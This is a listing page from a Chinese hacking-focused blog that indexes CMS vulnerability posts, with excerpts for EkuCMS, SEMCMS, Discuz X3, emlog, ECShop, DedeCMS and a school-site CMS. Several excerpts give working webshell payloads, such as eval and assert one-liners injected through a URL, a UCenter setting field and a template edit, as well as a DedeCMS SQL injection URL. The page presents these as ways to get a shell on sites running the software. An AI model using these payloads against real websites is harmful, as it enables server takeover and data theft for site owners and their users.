cms漏洞库 - 阿城's Blog - 关注网络安全 黑客技术爱好者 

阿城's Blog - 关注网络安全 黑客技术爱好者-阿城's Blog是一个关注网络安全,热爱黑客技术,分享各种技术教程资讯 —关注交流|web安全|漏洞发布|网络攻防|信息安全|网站建设



易酷cms本地包含漏洞拿shell

2017-12-16 18:40 作者:阿城 |引用(0) |评论(0) |阅读(596) cms漏洞库

测试版本:易酷cms2.5 包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])} 会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日 错误日志内容 ...

【阅读全文】

SEMCMS后台越权漏洞

2017-7-31 9:56 作者:阿城 |引用(0) |评论(0) |阅读(94) cms漏洞库

进入./admin/index.php 可以看到第一行就包含了当前目录下的core.php文件,我们进入这个文件看看 这是c...

【阅读全文】

Discuz X3 后台拿 shell

2017-1-26 14:34 作者:阿城 |引用(0) |评论(0) |阅读(354) cms漏洞库

适用于 Discuz X3.3 及之前版本 魔术引号需关闭 站长 - Ucenter 设置 - Ucenter 应用 ID 填入 123');file_put_contents('a.php','<?php assert($_POST[a])?>');// 它将在同目录下生成...

【阅读全文】

emlog 5.3.1 一个小漏洞可getshell(csrf)

2016-8-26 10:39 作者:阿城 |引用(0) |评论(0) |阅读(325) cms漏洞库

因为emlog官方应用中心并没有上架审核功能,所以别有目的的人可以直接在应用中心上传带有漏洞的脚本(没有病毒)然后根据emlog一个csrf就可以轻松getshell 应用中心里,大家不用登录ftp或服务器,就可以直接把官方审核后的插件安装到博客里,类似于Apple Store,应用中心如果要上架应用必须的审核!如果被不...

【阅读全文】

ecshop 后台拿 shell

2016-1-26 14:27 作者:阿城 |引用(0) |评论(0) |阅读(344) cms漏洞库

模板管理 - 语言项编辑 下拉栏选择 user.php 搜索 用户信息 后面加上代码 ${${assert($_POST[cmd])}} 确认修改 连接 根目录下 user.php 屡试不爽 ...

【阅读全文】

织梦cms注入漏洞

2013-12-16 10:31 作者:阿城 |引用(0) |评论(0) |阅读(343) cms漏洞库

   网上已经有几篇这样的文章了,当然我也是汇总了一些方法,并非原创。这个0day注入漏洞是1月份爆出来的,立马有人写出了利用方法。当然,渗透之路并非一番风顺,dede的安全防护做的也很好,所以成功与否仍然还是要看运气。     测试的是这两个网站:http://www.bian...

【阅读全文】

织梦cms漏洞全解

2013-12-16 10:10 作者:阿城 |引用(0) |评论(0) |阅读(284) cms漏洞库

命令 注入 攻击 PHP中可以使用下列5个函数来执行外部的应用程序或函数 system、exec、passthru、shell_exec、(与shell_exec功能相同) 函数原型 string system(string command, int return_var) command 要执行的命令 return_var 存放执...

【阅读全文】

dedecms5.6漏洞

2013-12-16 10:06 作者:阿城 |引用(0) |评论(0) |阅读(323) cms漏洞库

SQL注入漏洞1 注入点:http://192.168.1.130/member/buy_action.php?product= 完整payload: http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select da...

【阅读全文】

dedecms5.7漏洞

2013-12-16 9:55 作者:阿城 |引用(0) |评论(0) |阅读(277) cms漏洞库

请看看文件:include/filter.inc.php  引用一哥话语:  这是2B的dede再次变量覆盖漏洞根源。。  这是过滤或替换非法关键字。正常的。  /* 对_GET,_POST,_COOKIE进行过滤 */  fore...

【阅读全文】

智睿学校网站管理系统VER1.5.7后台漏洞

2010-1-16 9:40 作者:阿城 |引用(0) |评论(0) |阅读(400) cms漏洞库

漏洞页面:admin/admin_check.asp cookie: rtime=1; ltime=1268355028173; cnzz_eid=62880375-1268290090-; cnzz_a1746221=4; sin1746221...

【阅读全文】

 

仅供学习与交流,遵循法律法规 & 如有侵犯您的版权请联系我删除 & 手机版

CopyRight © 2016 阿城's Blog - 关注网络安全 黑客技术爱好者.  All rights reserved.